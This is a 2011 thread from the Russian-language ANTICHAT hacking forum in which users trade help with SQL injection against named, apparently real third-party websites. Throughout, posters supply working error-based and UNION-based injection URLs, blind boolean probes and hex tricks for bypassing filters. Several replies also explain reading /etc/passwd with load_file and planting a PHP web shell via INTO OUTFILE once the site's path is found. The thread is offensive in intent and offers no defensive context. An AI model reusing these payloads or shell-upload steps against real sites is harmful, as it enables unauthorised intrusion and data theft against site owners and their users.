ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.10.2011, 23:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от qaz
qaz said:
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?
на самом то деле причина просто в
Сообщение от None
http://english.in.ua/study.php
?id=7+or+1+group+by+concat((select+table_name+from +information_schema.tables
limit 0,1
),floor%28rand(0)*2))having+min(0)+or+1--+
Сообщение от vaddd
vaddd said:
site/news.php?id=18 and 1=1 (true)
site/news.php?id=6+AND+ascii(lower(substring(user(),1,1 )))=111 (true)
site/news.php?id=18 and 1=3 (false)
site/news.php?id=18 and 'a'='a'
в чем суть ошибки? mq вроде бы off
д а какая разница то? Юзай hex формат. А вообще можешь кинуть линк в пм, если просто интересно.
To, M1lten
Может банально идёт сверка $_REQUSET['login'] == $sql_resp['login']
$_REQUSET['login'] = sdf' sqlinj, а $sql_resp['login'] = выводимое тобою значение. Залогиниться возможно, когда идёт проверка на кол-во строк, которое вернулось после ввода. Может вообще два запроса на проверку логина и пароля, д дофига чего может быть и скуль не провести. Если ошибка от мускуля, то юзай error-based sqlinj
|
|
|
|
26.10.2011, 13:57
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от =Zeus=
=Zeus= said:
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:
PHP код:
PHP:
[COLOR="#000000"]SELECT '[COLOR="#0000BB"][/COLOR]' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;[/COLOR]
1. from mysql.userидёт до into dumpfile. Далее может идти только комментарий.
Либо ищем раскрытие путей на сайте, либо читаем через load_file каталоги и ищем полный путь к сайту, хотя возможно прав на папки не бует.
В этом случае Можно будет попробовать посмотреть директории, которые могут быть выведены с сервера, но находящийся в этом каталоге и доп. Файлы, которые можно прочитать или создать нужный файл
Сообщение от crackforme
crackforme said:
Сорри за нубство мужики
Такой вопрос
1,2,..group_concat(login)...
...concat_ws(login)...
не хочет выполнять как можно обойти фильтр?
пробовал
group_concat(CHAR(108,111,103,105,110))
тоже не работает
А разве это нужные функции, при раскрутке SQL-inj? Если фильтр идёт на них можно будет обойтись и без их использования.
|
|
|
26.10.2011, 17:37
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Есть доступ в phpmyadmin
Версия MySQL 5.5.9 как залить шелл?
Какие запросы?
|
|
|
|
26.10.2011, 17:46
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от aydin-ka
aydin-ka said:
Есть доступ в phpmyadmin
Версия MySQL 5.5.9 как залить шелл?
Какие запросы?
select '' into outfile 'абсолютный_путь_до_папки_с_ правами_на_запись/shell.php'
|
|
|
|
26.10.2011, 20:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Подскажите почему не выводит названия таблиц
http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,table_name,4,5+from+informat ion_schema.tables%27
|
|
|
|
26.10.2011, 21:02
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
Подскажите почему не выводит названия таблиц
http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,table_name,4,5+from+informat ion_schema.tables%27
http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,unhex(hex(table_name)),4,5+fro m+information_schema.tables--+
|
|
|
|
26.10.2011, 21:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от Konqi
Konqi said:
http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,unhex(hex(table_name)),4,5+fro m+information_schema.tables--+
да и без hex и anhex все норм выводит...
http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,table_name,4,5+from+informatio n_schema.tables--+
|
|
|
|
27.10.2011, 00:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Народ, а как ваше можно найти полный путь к файлу на хостинге?
|
|
|
|
27.10.2011, 00:27
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от qaz
qaz said:
Народ, а как ваше можно найти полный путь к файлу на хостинге?
/showthread.php?t=30632
|
|
|
|
27.10.2011, 14:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
4760
Репутация:
0
|
|
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1 можно ли раскрутить sql in?Если да то как?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
